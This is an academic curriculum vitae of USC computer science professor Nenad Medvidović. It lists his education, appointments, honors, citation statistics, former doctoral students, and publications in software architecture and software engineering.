**Bachelor of Science**, *Summa Cum Laude* (8/92, Cumulative GPA: 4.00) Arizona State University — Computer Science and Engineering Department

# 2 Employment and Major Organization Leadership

| | |
|---|---|
| 7/25 - present | TRW Chair in Engineering<br>University of Southern California, Los Angeles |
| 7/22 - present | Chair, Thomas Lord Department of Computer Science<br>University of Southern California, Los Angeles |
| 2/11 - present | Professor, Thomas Lord Department of Computer Science<br>University of Southern California, Los Angeles<br>3/05 - 2/11 Associate Professor with Tenure, USC<br>1/99 - 3/05 Assistant Professor, USC |
| 7/21 - 6/22 | Vice-Chair for Tenure Affairs, Department of Computer Science<br>University of Southern California, Los Angeles |
| 1/18 - 12/22 | Editor-in-Chief<br>IEEE Transactions on Software Engineering |
| 7/15 - 6/18 | Chair, Special Interest Group on Software Engineering (SIGSOFT)<br>Association for Computing Machinery (ACM) |
| 7/15 - 9/17 | Chair, Steering Committee<br>ACM SIGSOFT Symposium on the Foundations of Software Engineering |
| 11/13 - 10/15 | Chair, Steering Committee<br>International Conference on Software Engineering |
| 7/11 - 6/15 | Associate Chair for Ph.D. Affairs, Department of Computer Science<br>University of Southern California, Los Angeles |
| 1/09 - 1/13 | Director, Center for Systems and Software Engineering<br>Viterbi School of Engineering, University of Southern California, Los Angeles |
| 9/94 - 12/98 | Graduate Student Researcher<br>University of California, Irvine |
| 9/93 - 8/94 | Teaching Assistant<br>University of California, Irvine |
| 6/93 - 8/93 | Software Engineering Intern<br>Rupp Technology, Phoenix, AZ |
| 8/92 - 8/93 | Teaching Assistant<br>Arizona State University, Tempe |

# 3 Honors, Awards, Fellowships

| | |
|---|---|
| 2025 | Fellow, ACM (Association for Computing Machinery) |
| 2016 | Fellow, IEEE (Institute of Electrical and Electronics Engineers) |
| 2026 | IEEE TCSE (Technical Council on Software Engineering) Distinguished Service Award |
| 2025 | Most Influential Paper Award, IEEE Transactions on Software Engineering |
| 2023 | Alumni Hall of Fame, School of Information and Computer Sciences, University of California, Irvine |
| 2023 | IEEE Computer Society Golden Core Member |
| 2022 | Elected Member of IFIP Working Group 2.4 – Software Implementation Technologies |
| 2020 | ACM SIGSOFT (Special Interest Group on Software Engineering) Distinguished Service Award |
| 2020 | Most Influential Paper Award, International Conference on Software Engineering for Adaptive and Self-Managing Systems |
| 2018 | Distinguished Engineering Merit Award, Orange County Engineering Council |
| 2018 | Best Paper Award, International Conference on Software Architecture |
| 2017 | Best Tool-Paper Award, International Conference on Automated Software Engineering |
| 2017 | Best Paper Award, International Conference on Software Architecture |
| 2015 | Distinguished Scientist, ACM |
| 2010 | USC Mellon Mentoring Award |
| 2009 | Best Poster Award, International Conference on Program Comprehension |
| 2008 | Most Influential Paper Award, International Conference on Software Engineering |
| 2005, 2009 | Finalist, Most Influential Paper Award, International Conference on Software Engineering |
| 2007 | IBM Real-Time Innovation Faculty Award |
| 2007 | Most cited software engineering paper published in a scientific journal in 2000 |
| 2005 | Okawa Foundation Research Grant |
| 2000-2005 | National Science Foundation (NSF) CAREER Award |
| 1999, 2000 | USC, School of Engineering Teaching Honor Roll |
| 1993-94 | UC Irvine, Department of Information and Computer Science Fellowship |
| 1992 | Arizona State University, Moeur Award (top student in the graduating class) |
| 1991-93 | UPE National Honor Society for the Computing Sciences |
| 1990-93 | Golden Key National Honor Society |
| 1990-92 | Arizona Regents International Student Scholarship |
| 1989-92 | Dean’s Honor List, Arizona State University |

## 4 Selected Statistics

| | |
|---|---|
| • *Total number of citations* (scholar.google.com) | 21,829 |
| • *h-index* (scholar.google.com) | 65 |
| • *Most Influential Scholars in Software Engineering* (aminer.org) | 6th all-time |
| • *Most cited publication* (scholar.google.com) | 3,213 citations [J27] |
| • *Most cited papers, IEEE Trans. on Software Engr.* (academic.microsoft.com) | 7th [J27] |
| • *Most cited papers, ACM Trans. on Software Engr. & Methodology* (academic.microsoft.com) | 10th [J25] |

## 5 Graduated Doctoral Students

**PhD1** Marija Mikic, July 2004
VP of AV and AI Foundations at General Motors
previously Senior Engineering Director at Google Labs

**PhD2** Nikunj R. Mehta, September 2004
Founder and CEO at Falkonry
previously Consulting Member of Technical Staff at Oracle

**PhD3** Roshanak Roshandel, December 2006
Project Manager at Amazon
previously *Associate Professor* and *Department Chair* at Seattle University

**PhD4** Sam Malek, May 2007
*Professor* at UC Irvine

**PhD5** Chris Mattmann, August 2007
Chief Data and AI Officer at UCLA
Previously CTIO at Jet Propulsion Laboratory and *Adjunct Professor* at USC

**PhD6** Yuriy Brun, March 2008
*Professor* at University of Massachusetts
previously *Computing Innovation (CI) Post-Doctoral Fellow* at U. of Washington

**PhD7** Chiyoung Seo, May 2008
Senior Engineer at AirBnB
previously a Software Architect at Couchbase

**PhD8** George Edwards, July 2010
Founder and President of Quandary Peak Research

**PhD9** David Woollard, January 2011
CTO at Standard AI

**PhD10** Daniel Popescu, November 2011
Staff Software Engineer at Google

**PhD11** Ivo Krka, January 2014
Engineering Manager, Google

**PhD12** Hossein Tajalli, May 2014
Machine Learning Performance Architect at Intel
previously Senior Software Architect at NVIDIA

**PhD13** Joshua Garcia, May 2014
*Associate Professor* at UC Irvine

**PhD14** Jae young Bang, March 2015
CEO at Cyberonix
previously Software Litigation Consultant at Quandary Peak Research

**PhD15** Gholamreza Safi, July 2016
Software Engineer at Cloudera

**PhD16** Youn Kyu Lee, October 2017
CTO at OrthoCare
Previously *Assistant Professor* at Hongik University, Seoul, South Korea

**PhD17** Arman Shahbazian, May 2018
Staff Software Engineer at Google

**PhD18** Duc Minh Le, August 2018
Senior Software Engineer at Bloomberg

**PhD19** Yixue Zhao, December 2020
Founder of Yixue Research Institute
formerly *Computing Innovation (CI) Post-Doctoral Fellow* at U. of Massachusetts

**PhD20** Adriana Sejfia, December 2023
*Assistant Professor (Lecturer)* at University of Edinburgh

**PhD21** Saghar Talebipour, August 2024
Software Engineer at Snap

# 6 Publications

## Authored Books

**AB1** Richard N. Taylor, **Nenad Medvidović**, and Eric M. Dashofy. Software Architecture: Foundations, Theory, and Practice. *John Wiley & Sons*, January 2009, 736 pages. ISBN-10: 0470167742. ISBN-13: 978-0470167748.

## Edited Books and Journals

**EB2** Hakan Erdogmus, **Nenad Medvidović**, and Frances Paulisch, eds. IEEE Software – Special Issue on 50 Years of Software Engineering. *IEEE Computer Society*, vol. 35, no. 5, September/October 2018.

Winner of the 2019 APEX Award for Publication Excellence.

**EB3** Domenico Bianculli, **Nenad Medvidović**, and David Rosenblum, eds. 40 Editions of ICSE – The Ruby Anniversary Celebration. International Conference on Software Engineering, May 2018.

**EB4** **Nenad Medvidović** and Santonu Sarkar, eds. Proceedings of the 2017 Innovations in Software Engineering Conference, ACM, February 2017.

**EB5** Barbora Buhnova, Jorge Cuellar, Magnus Larsson, Javier López, **Nenad Medvidović**, Antonio Vallecillo, eds. Special Issue on Component-Based Software Engineering and Software Architecture, *Science of Computer Programming*, September 2014.

**EB6** Magnus Larsson and **Nenad Medvidović**, eds. Proceedings of the The 15th International ACM SIGSOFT Symposium on Component Based Software Engineering (CBSE-2012). ACM, June 2012.

**EB7** Harald Gall and **Nenad Medvidović**, eds. Proceedings of the 33rd International Conference on Software Engineering (ICSE 2011). ACM, May 2011.

**EB8** Fabrice Saffre, **Nenad Medvidović**, and Alberto Montresor, eds. Proceedings of the 3rd International Conference on Self-Adaptive and Self-Organizing Systems. IEEE Computer Society, September 2009.

**EB9** **Nenad Medvidović** and Tetsuo Tamai, eds. Proceedings of the Warm Up Workshop for the 32nd International Conference on Software Engineering. ACM, April 2009.

**EB10** Robert Nord, **Nenad Medvidović**, Rene Krikhaar, Judith Stafford, Jan Bosch, eds. Proceedings of the 5th Working IEEE/IFIP Conference on Software Architecture. *IEEE Computer Society*, March 2006.

## Refereed Journal Articles

**J1** Benyamin Beyzaei, Saghar Talebipour, Ghazal Rafiei, **Nenad Medvidović**, and Sam Malek. Automated Test Transfer across Android Apps using Large Language Models. Proceedings of the ACM on Software Engineering, vol. 2, no. ISSTA, article ISSTA098 (July 2025).

**J2** Jae young Bang, Yuriy Brun, and **Nenad Medvidović**. Collaborative Design Conflicts: Costs and Solutions. *IEEE Software*, vol. 35, no. 6 (November/December 2018).

**J3** Thibaud Lutellier, Devin Chollak, Joshua Garcia, Lin Tan, Derek Rayside, **Nenad Medvidović**, and Robert Kroeger. Measuring the Impact of Code Dependencies on Software Architecture Recovery Techniques. *IEEE Transactions on Software Engineering*, vol. 44, no. 2 (February 2017).

**J4** Pooyan Behnamghader, Duc Minh Le, Joshua Garcia, Daniel Link, Arman Shahbazian, and **Nenad Medvidović**. A Large-Scale Study of Architectural Evolution in Open-Source Software Systems. *Journal of Empirical Software Engineering*, vol. 22, no. 3 (June 2017).

**J5** Hamid Bagheri, Joshua Garcia, Alireza Sadeghi, Sam Malek, and **Nenad Medvidović**. Software Architectural Principles in Contemporary Mobile Software: from Conception to Practice. *Journal of Systems and Software*, vol. 119 (September 2016).

**J6** Yuriy Brun, Jae young Bang, George Edwards, and **Nenad Medvidović**. Self-Adapting Reliability in Distributed Systems. *IEEE Transactions on Software Engineering*, vol. 41, no. 8 (August 2015).

**J7** Chris Mattmann, Joshua Garcia, Ivo Krka, Daniel Popescu, and **Nenad Medvidović**. Revisiting the Anatomy and Physiology of the Grid. *Journal of Grid Computing*, vol. 13, no. 1 (March 2015).

**J8** Yuriy Brun and **Nenad Medvidović**. Entrusting Private Computation and Data to Untrusted Networks. *IEEE Transactions on Dependable and Secure Computing*, vol. 10, no. 4 (July/ August 2013).

**J9** Hossein Tajalli and **Nenad Medvidović**. iDARE — A Reference Architecture for Integrated Software Environments. *Journal of Software: Practice and Experience*, vol. 44, no. 3 (March 2014).

**J10** Chris A. Mattmann, **Nenad Medvidović**, Sam Malek, George Edwards, and Somo Banerjee. A Middleware Platform for Providing Mobile and Embedded Computing Instruction to Software Engineering Students. *IEEE Transactions on Education*, vol. 55, no. 3 (August 2012).

**J11** Sam Malek, **Nenad Medvidović**, and Marija Mikic-Rakic. An Extensible Framework for Improving a Distributed Software System's Deployment Architecture. *IEEE Transactions on Software Engineering*, vol. 38, no. 1 (January/February 2012).

**J12** **Nenad Medvidović**, Hossein Tajalli, Joshua Garcia, Yuriy Brun, Ivo Krka, and George Edwards. Engineering Heterogeneous Robotics Systems: A Software Architecture-Based Approach. *IEEE Computer*, vol. 44, no. 5 (May 2011).

**J13** Sam Malek, George Edwards, Yuriy Brun, Hossein Tajalli, Joshua Garcia, Ivo Krka, **Nenad Medvidović**, Marija Mikic-Rakic, and Gaurav Sukhatme. An Architecture-Driven Software Mobility Framework. *Journal of Systems and Software*, special issue on Software Architecture and Mobility, vol. 83, no. 6 (June 2010).

**J14** **Nenad Medvidović** and George Edwards. Software Architecture and Mobility: A Roadmap. *Journal of Systems and Software*, special issue on Software Architecture and Mobility, vol. 83, no. 6 (June 2010).

**J15** David Woollard, **Nenad Medvidović**, Yolanda Gil, and Chris A. Mattmann. Scientific Software as Workflows: From Discovery to Distribution. *IEEE Software*, special issue on Developing Scientific Software, vol. 25, no. 4 (July/August, 2008).

**J16** George Edwards, Chiyoung Seo, and **Nenad Medvidović**. Model Interpreter Frameworks: A Foundation for the Analysis of Domain-Specific Software Architectures. *Journal of Universal Computer Science*, special issue on Software Components, Architectures, and Reuse, volume 14, number 8 (2008).

**J17** **Nenad Medvidović**, Eric M. Dashofy, and Richard N. Taylor. Moving Architectural Description from Under the Technology Lamppost. *Journal of Information and Software Technology*, vol. 49, no. 1 (January 2007).

**J18** **Nenad Medvidović**, Rene Krikhaar, Robert Nord, and Judith Stafford. Understanding the Past, Improving the Present, and Mapping out the Future of Software Architecture. *Journal of Systems and Software*, vol. 79, no. 12 (December 2006).

**J19** **Nenad Medvidović** and Vladimir Jakobac. Using Software Evolution to Focus Architectural Recovery. *Journal of Automated Software Engineering*, vol. 13, no. 2 (April 2006).

**J20** Sam Malek, Marija Mikic-Rakic, and **Nenad Medvidović**. A Style-Aware Architectural Middleware for Resource-Constrained, Distributed Systems. *IEEE Transactions on Software Engineering*, vol. 31, no. 3 (March 2005).

**J21** Roshanak Roshandel, Andre van der Hoek, Marija Mikic-Rakic, and **Nenad Medvidović**. Mae - A System Model and Environment for Managing Architectural Evolution. *ACM Transactions on Software Engineering and Methodology*, vol. 11, no. 2 (April 2004).

**J22** Paul Gruenbacher, Alexander Egyed, and **Nenad Medvidović**. Reconciling Software Requirements and Architectures with Intermediate Models. *Springer Journal of Software and System Modeling*, vol. 3, no. 3, pages 235-253 (August 2004).

**J23** **Nenad Medvidović**, Paul Gruenbacher, Alexander Egyed, and Barry W. Boehm. Bridging Models across the Software Lifecycle. *Journal of Systems and Software*, vol. 68, no. 3 (December 2003).

**J24** **Nenad Medvidović**, Marija Mikic-Rakic, Nikunj Mehta, and Sam Malek. Software Architectural Support for Handheld Computing. *IEEE Computer*, special issue on Handheld Computing, vol. 36, no. 9 (September 2003).

**J25** **Nenad Medvidović**, Eric M. Dashofy, and Richard N. Taylor. The Role of Middleware in Architecture-Based Software Development. *International Journal of Software Engineering and Knowledge Engineering*, vol. 13, no. 4 (August 2003).

**J26** **Nenad Medvidović**, David S. Rosenblum, David F. Redmiles, and Jason E. Robbins. Modeling Software Architectures in the Unified Modeling Language. *ACM Transactions on Software Engineering and Methodology*, vol. 11, no. 1 (January 2002).

**J27** Alexander Egyed, **Nenad Medvidović**, and Cristina Gacek. A Component-Based Perspective on Software Mismatch Detection and Resolution. *IEE Proceedings - Software Engineering*, vol. 147, no. 6 (December 2000).

**J28** **Nenad Medvidović** and Richard N. Taylor. A Classification and Comparison Framework for Software Architecture Description Languages. *IEEE Transactions on Software Engineering*, vol. 26, no. 1 (January 2000).

Reprinted in *Rational Developer Network: Seminal Papers on Software Architecture*, Rational Software Corp. (July 2001). Named most widely cited software engineering paper published in 2000 by the *Journal of Information and Software Technology* (January 2007). Selected Most Influential Paper of IEEE TSE's 3rd decade (March 2025).

**J29** Peyman Oreizy, Michael M. Gorlick, Richard N. Taylor, Dennis Heimbigner, Gregory Johnson, **Nenad Medvidović**, Alex Quilici, David S. Rosenblum, and Alexander L. Wolf. An Architecture-Based Approach to Self-Adaptive Software. *IEEE Intelligent Systems and Their Applications*, vol. 14, no. 3 (May/June 1999).

**J30** **Nenad Medvidović** and Richard N. Taylor. Exploiting Architectural Style to Develop a Family of Applications. *IEE Proceedings - Software Engineering*, vol. 144, no. 5-6 (October-December 1997).

**J31** Richard N. Taylor, **Nenad Medvidović**, Kenneth M. Anderson, E. James Whitehead, Jr., Jason E. Robbins, Kari A. Nies, Peyman Oreizy, and Deborah L. Dubrow. A Component- and Message-Based Architectural Style for GUI Software. *IEEE Transactions on Software Engineering*, vol. 22, no. 6 (June 1996).

## Refereed Conference Publications

**C1** Tuan Ngo, Abid Hassan, Saad Shafiq, and **Nenad Medvidović**. DNN Modularization via Activation-Driven Training. In Proceedings of the 48th IEEE/ACM International Conference on Software Engineering (ICSE 2026), Rio de Janeiro, April 2026. Accepted – to appear.

**C2** Satyaki Das, Syeda Tasnim Fabiha, Saad Shafiq, and **Nenad Medvidović**. Are We Learning the Right Features? A Framework for Evaluating DL-Based Software Vulnerability Detection Solutions. In Proceedings of the 47th IEEE/ACM International Conference on Software Engineering (ICSE 2025), Ottawa, Canada, April-May 2025.

**C3** Sadra Sabouri, Philipp Eibl, Xinyi Zhou, Morteza Ziyadi, **Nenad Medvidović**, Lars Lindemann, and Souti Chattopadhyay. Trust Dynamics in AI-Assisted Development: Definitions, Factors, and Implications. In Proceedings of the 47th IEEE/ACM International Conference on Software Engineering (ICSE 2025), Ottawa, Canada, April-May 2025.

**C4** Adriana Sejfia, Satyaki Das, Saad Shafiq, and **Nenad Medvidović**. Toward Improved Deep Learning-based Vulnerability Detection. In Proceedings of the 46th IEEE/ACM International Conference on Software Engineering (ICSE 2024), Lisbon, Portugal, April 2024.

**C5** Yutian Yan, Yunhui Zheng, Xinyue Liu, **Nenad Medvidović**, and Weihang Wang. AdHere: Automated Detection and Repair of Intrusive Ads. In Proceedings of the 45th IEEE/ACM International Conference on Software Engineering (ICSE 2023), Melbourne, Australia, May 2023.

**C6** Saghar Talebipour, Hyojae Park, Kesina Baral, Leon Yee, Safwat Ali, Kevin Moran, Yuriy Brun, **Nenad Medvidović**, and Yixue Zhao. AVGUST: A tool for Generating Usage-Based Tests from Videos of App Executions. In Proceedings of the 45th IEEE/ACM International Conference on Software Engineering (ICSE 2023), Demonstrations Track, Melbourne, Australia, May 2023.

**C7** Yixue Zhao, Saghar Talebipour, Kesina Baral, Hyojae Park, Leon Yee, Safwat Ali Khan, Yuriy Brun, **Nenad Medvidović**, and Kevin Moran. AVGUST: Automating Usage-Based Test Generation from Videos of App Executions. In Proceedings of the 30th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2022), Singapore, November 2022.

**C8** Saghar Talebipour, Yixue Zhao, Luka Dojcilovic, Chenggang Li, and **Nenad Medvidović**. UI Test Migration Across Mobile Platforms. In Proceedings of the 36th IEEE/ACM International Conference on Automated Software Engineering (ASE 2021), November 2021.

**C9** Adriana Sejfia, Yixue Zhao, and **Nenad Medvidović**. Identifying Casualty Changes in Software Patches. In Proceedings of the 29th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2021), September 2021.

**C10** Yixue Zhao, Siwei Yin, Adriana Sejfia, Marcelo Schmitt Laser, Haoyu Wang, and **Nenad Medvidović**. Assessing the Feasibility of Web-Request Prediction Models on Mobile Platforms. In Proceedings of the 8th International Conference on Mobile Software Engineering and Systems (MobileSoft 2021), May 2021.

**C11** Marcelo Schmitt Laser, Duc Minh Le, Joshua Garcia and **Nenad Medvidović**. Architectural Archipelagos: Technical Debt in Long-Lived Software Research Platforms. In Proceedings of the 4th International Conference on Technical Debt (TechDebt 2021), May 2021.

**C12** Joshua Garcia, Mehdi Mirakhorli, Lu Xiao, Yutong Zhao, Ibrahim Mujhid, Khoi Pham, Ahmet Okutan, Sam Malek, Rick Kazman, Yuanfang Cai, and **Nenad Medvidović**. Constructing a Shared Infrastructure for Software Architecture Analysis and Maintenance. In Proceedings of the IEEE 18th International Conference on Software Architecture (ICSA 2021), March 2021.

**C13** Duc Minh Le, Suhrid Karthik, Marcelo Schmitt Laser, and **Nenad Medvidović**. Architectural Decay as Predictor of Issue-and Change-Proneness. In Proceedings of the IEEE 18th International Conference on Software Architecture (ICSA 2021), March 2021.

**C14** Arman Shahbazian, Suhrid Karthik, Yuriy Brun, and **Nenad Medvidović**. eQual: Informing Early Design Decisions. In Proceedings of the ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2020), Sacramento, CA, November 2020.

**C15** Yixue Zhao, Justin Chen, Adriana Sejfia, Marcelo Schmitt Laser, Jie Zhang, Federica Sarro, Mark Harman, and **Nenad Medvidović**. FrUITeR - A Framework for Evaluating UI Test Reuse. In Proceedings of the ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2020), Sacramento, CA, November 2020.

**C16** Gvozden Marinkovic, Nikola Lukic, and **Nenad Medvidović**. Online Sports Betting Through the Prism of Software Engineering. In Proceedings of the ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2020), Industrial Track, Sacramento, CA, November 2020.

**C17** Marcelo Schmitt Laser, Duc Minh Le, Joshua Garcia, and **Nenad Medvidović**. ARCADE: An Extensible Workbench for Architecture Recovery, Change, and Decay Evaluation. In Proceedings of the ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2020), Tool Demonstrations Track, Sacramento, CA, November 2020.

**C18** Nikola Lukic, Saghar Talebipour, and **Nenad Medvidović**. Remote Control of iOS Devices via Accessibility Features. In Proceedings of the Workshop on Forming an Ecosystem Around Software Transformation (FEAST 2020), November 2020.

**C19** Nikola Lukic, Saghar Talebipour, and **Nenad Medvidović**. AirMochi - A Tool for Remotely Controlling iOS Devices. In Proceedings of the 35th International Conference on Automated Software Engineering (ASE 2020), Melbourne, Australia, September 2020.

**C20** Adriana Sejfia and **Nenad Medvidović**. Strategies for Pattern-Based Detection of Architecturally-Relevant Software Vulnerabilities (Don't Try This at Home - It Doesn't Work). In Proceedings of the 4th IEEE International Conference on Software Architecture (ICSA 2020), Salvador, Brazil, March 2020.

**C21** Yixue Zhao and **Nenad Medvidović**. A Microservice Architecture for Online Mobile App Optimization. In Proceedings of the 6th International Conference on Mobile Software Engineering and Systems (MOBILESoft 2019), Montreal, Canada, 2019.

**C22** Suhrid Karthik and **Nenad Medvidović**. Automatic Detection of Latent Component Relationships from Online Q&A Sites. In Proceedings of the 7th International Workshop on Realizing Artificial Intelligence Synergies in Software Engineering (RAISE 2019), Montreal, Canada, May 2019.

**C23** Yixue Zhao, Paul Wat, Marcelo Laser, and **Nenad Medvidović**. Empirically Assessing Opportunities for Prefetching and Caching in Mobile Apps. In Proceedings of the 33rd IEEE/ACM International Conference on Automated Software Engineering (ASE 2018), Montpelier, France, September 2018.

**C24** Daye Nam, Youn Kyu Lee, and **Nenad Medvidović**. EVA: A Tool for Visualizing Software Architectural Evolution. In Proceedings of the 40th International Conference on Software Engineering (ICSE 2018), Tool Demonstrations Track, Gothenburg, Sweden, May 2018.

**C25** Yixue Zhao, Marcelo Laser, Yingjun Lyu, and **Nenad Medvidović**. Leveraging Program Analysis to Reduce User-Perceived Latency in Mobile Applications. In Proceedings of the 40th International Conference on Software Engineering (ICSE 2018), Gothenburg, Sweden, May 2018.

**C26** Arman Shahbazian, Daye Nam, and **Nenad Medvidović**. Toward Predicting Architectural Significance of Implementation Issues. In Proceedings of the 15th IEEE/ACM International Conference on Mining Software Repositories (MSR 2018), Gothenburg, Sweden, May 2018.

**C27** Duc Minh Le, Daniel Link, Arman Shahbazian, and **Nenad Medvidović**. An Empirical Study of Architectural Decay in Open-Source Software. In Proceedings of the 15th IEEE International Conference on Software Architecture (ICSA 2018), Seattle, WA, April 2018.

Winner of the ICSA 2018 Best Paper Award

**C28** Arman Shahbazian, Youn Kyu Lee, and **Nenad Medvidović**. Recovering Architectural Design Decisions. In Proceedings of the 15th IEEE International Conference on Software Architecture (ICSA 2018), Seattle, WA, April/May 2018.

**C29** Youn Kyu Lee, Peera Yoodee, Arman Shahbazian, Daye Nam, and **Nenad Medvidović**. SEALANT: A Detection and Visualization Tool for Inter-app Security Vulnerabilities in Android. In Proceedings of the 32nd IEEE/ACM International Conference on Automated Software Engineering (ASE 2017), Urbana-Champaign, USA, November 2017.

Winner of the ASE 2017 Best Tool-Paper Award

**C30** Youn Kyu Lee, Jae Young Bang, Gholamreza Safi, Arman Shahbazian, Yixue Zhao, and **Nenad Medvidović**. A SEALANT for Inter-App Security Holes in Android. In Proceedings of the 39th International Conference on Software Engineering (ICSE 2017), Buenos Aires, Argentina, May 2017.

**C31** Jae young Bang, Yuriy Brun, and **Nenad Medvidović**. Continuous Analysis of Collaborative Design. In Proceedings of the 14th IEEE International Conference on Software Architecture (ICSA 2017), Gothenburg, Sweden, April 2017.

Winner of the ICSA 2017 Best Paper Award

**C32** Martin Robillard and **Nenad Medvidović**. Disseminating Architectural Knowledge on Open-Source Projects. In Proceedings of the 38th International Conference on Software Engineering (ICSE 2016), Austin, TX, May 2016.

**C33** Arman Shahbazian, George Edwards, and **Nenad Medvidović**. An End-to-End Domain-Specific Modeling and Analysis Platform. In Proceedings of the 8th International Workshop on Modeling in Software Engineering (MISE 2016), Austin, TX, May 2016.

**C34** Michael Langhammer, Arman Shahbazian, **Nenad Medvidović**, and Ralf Reussner. Automated Extraction of Rich Software Models from Limited System Information. In Proceedings of the 13th Working IEEE/IFIP Conference on Software Architecture (WICSA 2016), Venice, Italy, April 2016.

**C35** Duc Minh Le, Carlos Carrillo, Rafael Capilla, and **Nenad Medvidović**. Relating Architectural Decay and Sustainability of Software Systems. In Proceedings of the 13th Working IEEE/IFIP Conference on Software Architecture (WICSA 2016), Venice, Italy, April 2016.

**C36** Gholamreza Safi, Arman Shahbazian, William G.J. Halfond, and **Nenad Medvidović**. Detecting Event Anomalies in Event-Based Systems. In Proceedings of the 10th joint meeting of the European Software Engineering Conference and the ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2015), Bergamo, Italy, September 2015.

**C37** Duc Minh Le, Pooyan Behnamghader, Joshua Garcia, Daniel Link, Arman Shahbazian, and **Nenad Medvidović**. An Empirical Study of Architectural Change in Open-Source Software Systems. In Proceedings of the 12th Working Conference on Mining Software Repositories (MSR 2015), Florence, Italy, May 2015.

Fast-tracked for journal publication as one of the best papers of the conference.

**C38** Thibaud Lutellier, Devin Chollak, Joshua Garcia, Lin Tan, Derek Rayside, **Nenad Medvidović**, and Robert Kroeger. Comparing Software Architecture Recovery Techniques Using Accurate Dependencies. In Proceedings of the 37th International Conference on Software Engineering (ICSE 2015), Software Engineering in Practice Track, Florence, Italy, May 2015.

**C39** Jae young Bang and **Nenad Medvidović**. Proactive Detection of Higher-Order Software Design Conflicts. In Proceedings of the 12th Working IEEE/IFIP Conference on Software Architecture (WICSA 2015), Montreal, Canada, May 2015.

**C40** Ivo Krka, Yuriy Brun, and **Nenad Medvidović**. Automatic Mining of Specifications from Invocation Traces and Method Invariants. In Proceedings of the 22nd ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE 2014), Hong Kong, November 2014.

**C41** Youn Kyu Lee, Jae young Bang, Joshua Garcia, and **Nenad Medvidović**. ViVA: A Visualization and Analysis Tool for Distributed Event-Based Systems. In Proceedings of the 36th International Conference on Software Engineering (ICSE 2014), Formal Demonstration Track, Hyderabad, India, June 2014.

**C42** Ivo Krka, Nicolas D'Ippolito, **Nenad Medvidović**, and Sebastian Uchitel. Revisiting Compatibility of Input-Output Modal Transition Systems. In Proceedings of the 19th International Symposium on Formal Methods (FM 2014), Singapore, May 2014.

**C43** Ivo Krka and **Nenad Medvidović**. Component-Aware Triggered Scenarios. In Proceedings of the 11th Working IEEE/IFIP Conference on Software Architecture (WICSA 2014), Sydney, Australia, April 2014.

**C44** Joshua Garcia, Igor Ivkovic, and **Nenad Medvidović**. A Comparative Analysis of Software Architecture Recovery Techniques. In Proceedings of the 28th IEEE/ACM International Conference on Automated Software Engineering (ASE 2013), Palo Alto, CA, November 2013.

**C45** Joshua Garcia, Daniel Popescu, Gholamreza Safi, William G.J. Halfond, and **Nenad Medvidović**. Identifying Message Flow in Distributed Event-Based Systems. In Proceedings of the 9th joint meeting of the European Software Engineering Conference and the ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC/FSE 2013), St. Petersburg, Russia, August 2013.

**C46** Ivo Krka and **Nenad Medvidović**. Distributing Refinements of a System-Level Partial Behavior Model. In Proceedings of the 21st International Conference on Requirements Engineering, Rio de Janeiro, Brazil, July 2013.

**C47** Joshua Garcia, Ivo Krka, Chris Mattmann, and **Nenad Medvidović**. Obtaining Ground-Truth Software Architectures. In Proceedings of the 35th International Conference on Software Engineering (ICSE 2013), Software Engineering in Practice Track, San Francisco, CA, May 2013.

**C48** Jae young Bang, Ivo Krka, **Nenad Medvidović**, Naveen Kulkarni, and Srinivas Padmanabhuni. How Software Architects Collaborate: Insights from Collaborative Software Design in Practice. In Proceedings of the 6th International Workshop on Cooperative and Human Aspects of Software Engineering (CHASE 2013), San Francisco, CA, May 2013.

**C49** Ran Mo, Joshua Garcia, Yuanfang Cai, and **Nenad Medvidović**. Mapping Architectural Smells into Dependency Models. In Proceedings of the 4th International Workshop on Managing Technical Debt (MTD 2013), San Francisco, CA, May 2013.

**C50** Christoph Dorn, George Edwards, and **Nenad Medvidović**. Analyzing Design Tradeoffs in Large-scale Socio-Technical Systems through Simulation of Dynamic Collaboration Patterns. In Proceedings of the 20th International Conference on Cooperative Information Systems (CoopIS 2012), Rome, Italy, September 2012.

**C51** Joshua Garcia, Ivo Krka, **Nenad Medvidović**, and Chris Douglas. A Framework for Obtaining the Ground-Truth in Architectural Recovery. In Proceedings of the Joint Working IEEE/IFIP Conference on Software Architecture and European Conference on Software Architecture (WICSA/ECSA 2012), Helsinki, Finland, August 2012.

**C52** George Edwards, Yuriy Brun, and **Nenad Medvidović**. Automated Analysis and Code Generation for Domain-Specific Models. In Proceedings of the Joint Working IEEE/IFIP Conference on Software Architecture and European Conference on Software Architecture (WICSA/ECSA 2012), Helsinki, Finland, August 2012.

**C53** Daniel Popescu, Joshua Garcia, Kevin Bierhoff, and **Nenad Medvidović**. Impact Analysis for Distributed Event-Based Systems. In Proceedings of the 6th ACM International Conference on Distributed Event-Based Systems (DEBS 2012), Berlin, Germany, July 2012.

**C54** Ivo Krka and **Nenad Medvidović**. Revisiting Modal Interface Automata. In Proceedings of the Workshop on Formal Methods in Software Engineering: Rigorous and Agile Approaches (FormSERA), Zurich, Switzerland, June 2012.

**C55** Hossein Tajalli and **Nenad Medvidović**. A Reference Architecture for Integrated Development and Run-Time Environments. In Proceedings of the 2nd Workshop on Developing Tools as Plug-ins (TOPI), San Francisco, CA, June 2012.

**C56** Yuriy Brun and **Nenad Medvidović**. Keeping Data Private while Computing in the Cloud. In Proceedings of the 5th International Conference on Cloud Computing (IEEE CLOUD 2012), Honolulu, HI, June 2012.

**C57** Leslie Cheung, Ivo Krka, Leana Golubchik, and **Nenad Medvidović**. Architecture-Level Reliability Prediction for Concurrent Systems. In Proceedings of the 3rd International Conference on Performance Engineering (ICPE 2012), Boston, MA, April 2012.

